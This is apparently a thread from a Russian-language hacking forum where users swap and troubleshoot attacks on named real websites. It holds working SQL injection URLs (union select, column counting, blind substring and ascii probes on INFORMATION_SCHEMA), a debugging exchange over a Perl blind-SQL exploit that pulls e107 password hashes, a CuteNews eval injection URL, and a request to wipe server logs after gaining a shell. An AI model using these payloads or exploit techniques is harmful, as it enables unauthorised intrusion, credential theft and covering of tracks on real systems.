Делаю +from+table_name+where+not+summ10=""/* Ошибка. Не получается. Если делать так +from+customers+where+summ10=271/* (значение 271 присутсвует в summ10) то выводит поле со всеми данными этой таблицы. Но мне надо всех, где значение summ10 не пустое..
+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3 a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10+<>+0/*
***.com/index.php?pid=-1'+union+select+1,2,3,4,5,6,7-- Ошибку выводит You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1 Число столбцов определил "order by" Что делать не представляю
diznt попробуй вместо -- подставить /* или вообше там ниче неставь.А вообше кидай сюда линк на сайт если ниче страшного там нет , а люди посотрят что можно сделать
Третья ветка http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid=1'+and+substring(version(),1,1)=3/*&language=1
сорри. продублирую есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit" вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое: Code: [+] e107 <= 0.7.13 Blind SQL Injection [+] Admin/User's Password Retrieve Exploit [+] Coded by __GiReX__ [+] Logged in with your account.. [+] Checking database delay, please wait.. [+] Normal delay: 1 [+] Benchmark delay: 13 [+] Victim password: f [-] Exploit mistake: please re-check benchmark Я так понимаю, загвоздка где-то здесь: Code: for(my $j = 1; $j <= 32; $j++) { foreach $char(@cset) { info(chr($char), $hash, "password"); my ($pre_time, $post_time) = time(); $rv = check_char($char, $j, "user_password"); $post_time = time(); if($rv and ($post_time - $pre_time) > ($ndelay + 3)) { $hash .= chr($char); last; } } last if $j != length($hash); } if(not defined $hash or length($hash) != 32) { print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n"; exit; } Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал: Code: ... [+] Logged in with your account.. [+] Checking database delay, please wait.. [+] Normal delay: 1 [+] Benchmark delay: 13 [+] Victim password: f [+] You can try to login with this cookie: [+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "". Так что же делать? как заставить скрипт работать? подскажите плиз, я не бум-бум.
почему не катит?: http://www.ascon.kz/index.php?news=144+and+lower(substr((SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1))='c'
А зачем изврат-то? Скуль вроде обычный. Не катит потому, что ковычки фильтруются Попробуй: http://www.ascon.kz/index.php?news=144+union+select+1,2,3,'44',5,6/* а вот так покатит, если нужен подзапрос: http://www.ascon.kz/index.php?news=144+and+ascii(lower(substr((SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1)))=99 99 это 'с' как ты понимаешь , тренируешься?
Народ нужна ваша помощь! Именно от вас зависит моя судьба! И так имееться шелл, я могу ходить по всем папкам... нужно перезаписать или удалить в папке /logs файлы error.log и access.log я не могу их просто так удалить или перезаписать то есть там стоят прова чтобы незя было записыватЬ! что делать?!
Здраствуйте! у меня вопрос http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+6-- выдает страничку, а http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+7-- ошибку. Но запрос вида http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+union+select+1,2,3,4,5,6-- не работает. Объясните чайнику
Блин ЛЮДИИИ ПОМОГИТЕЕ!! Не знаю чё делать ващееееее. https://forum.antichat.ru/showpost.php?p=935746&postcount=3618
не работает сплоит, есть мыди почему? cutenews 1.1.1 (strawbery) http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo();
Ты по ссылке вапше ходил? Там вапшет 32таблицы! Я шяс с моба...буду за компом,запостю правильную линку...
